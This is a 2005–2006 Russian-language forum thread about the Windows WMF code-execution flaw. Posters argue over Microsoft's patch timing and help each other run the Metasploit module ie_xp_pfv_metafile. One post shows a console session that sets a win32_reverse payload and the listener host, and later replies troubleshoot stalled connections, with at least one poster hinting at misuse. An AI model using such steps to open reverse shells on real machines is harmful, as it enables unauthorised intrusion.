что такое msf и где его брать?
Выполнение произвольного кода в Microsoft Windows при обработке WMF фа
|
30.12.2005 14:44:15
|
|
|
|
|
|
30.12.2005 16:18:57
пускай работает на здоровье, не надо стандартным виндовым просмотрщиком пользоваться
 , делов то |
|
|
|
|
|
30.12.2005 18:46:10
а по поводу воркграунда - то совершенно согласен... |
|||
|
|
|
|
30.12.2005 22:25:40
Что до методов фикса - я неоднократно говорил что хакеры имеют такое неприятное свойство как класть на расписание выпуска патчей микрософтом большой .... болт!Соответственно я не понимаю почему MS считает себя в праве релизить фиксы для критичных дыр по расписанию.По моему разумению на то чтобы исправить ОДНУ длл и проверить что ничего попутно не отвалилось надо этак дня 3 (а с ресурсами то M$ и того меньше поди). |
|||
|
|
|
|
30.12.2005 22:26:43
:help: на чем написан exploit? :help:
|
|
|
|
|
|
31.12.2005 03:05:31
скрипт работает.
реально опасный vuln и ещё новый... развлекусь я в новый год... |
|
|
|
|
|
31.12.2005 03:26:50
И на пёрле! |
|||
|
|
|
|
01.01.2006 12:53:53
msf ie_xp_pfv_metafile > set PAYLOADS win32_reverse
PAYLOADS -> win32_reverse msf ie_xp_pfv_metafile > show options Exploit Options =============== Exploit: Name Default Description -------- -------- ------- ---------------------------- optional HTTPHOST 0.0.0.0 The local HTTP listener host required HTTPPORT 8080 The local HTTP listener port Target: Automatic - Windows XP / Windows 2003 msf ie_xp_pfv_metafile > set HTTPHOST 10.20.12.6 HTTPHOST -> 10.20.12.6 msf ie_xp_pfv_metafile > set LHOST 10.20.12.6 LHOST -> 10.20.12.6 msf ie_xp_pfv_metafile > exploit [*] This exploit requires a valid payload to be specified first. msf ie_xp_pfv_metafile > в чем вопрос? |
|
|
|
|
|
01.01.2006 19:13:59
Так...продвижение уже есть. Теперь чисто кодерский вопрос......А чё это за ошибка?
D:\Perl\bin>1.pl Base class package "Msf::Exploit" is empty. (Perhaps you need to 'use' the module which defines that package first.) at MyModuie.pm line 6 BEGIN failed--compilation aborted at MyModuie.pm line 6. Compilation failed in require at D:\Perl\bin\1.pl line 3. BEGIN failed--compilation aborted at D:\Perl\bin\1.pl line 3. Файл 1.pl: #!/usr/bin/perl use MyModuie; Помогите плз... |
|
|
|
|
|
02.01.2006 11:47:32
Пока существуют такие деревья, которые думают, что эксплойт написан на перле, а сама бага - это buffer overflow(кстати, также утверждает наш "многоуважаемый" ЗАРАЗА в своем секурити-блоге ;-)), мы без работы не останемся.
ps: люблю русский лес! |
|
|
|
|
|
02.01.2006 12:36:21
Всё я понял свою ошибку!
Нужно делать на MFS. |
|
|
|
|
|
03.01.2006 01:15:38
В том то и фишка, что с необычными работает  |
|||
|
|
|
|
03.01.2006 12:13:28
у меня на
Waiting for connections to останавливается и дальше не идет.. |
|
|
|
|
|
03.01.2006 12:23:32
у тебя скорее всего файервол режет соединение.
|
|
|
|
|
|
03.01.2006 12:56:36
у меня графика была запрещена
 тока вот что с этим всем дальше делать? |
|
|
|
|
|
03.01.2006 13:45:57
Пацаны,у меня та же фигня. На строке Waiting for connections to зависает, открываю wmf фаилы, дальше нихрена не идет. Файрвалл отключил. Если кто знает,подскажите плс.
|
|
|
|
|
|
03.01.2006 14:41:52
set HTTPORT
set HTTPHOST нужно установить и графику разрешить и все заработает :funny: 8) |
|
|
|
|
|
03.01.2006 16:24:14
and set LHOST
|
||||
|
|
|
|||
Читают тему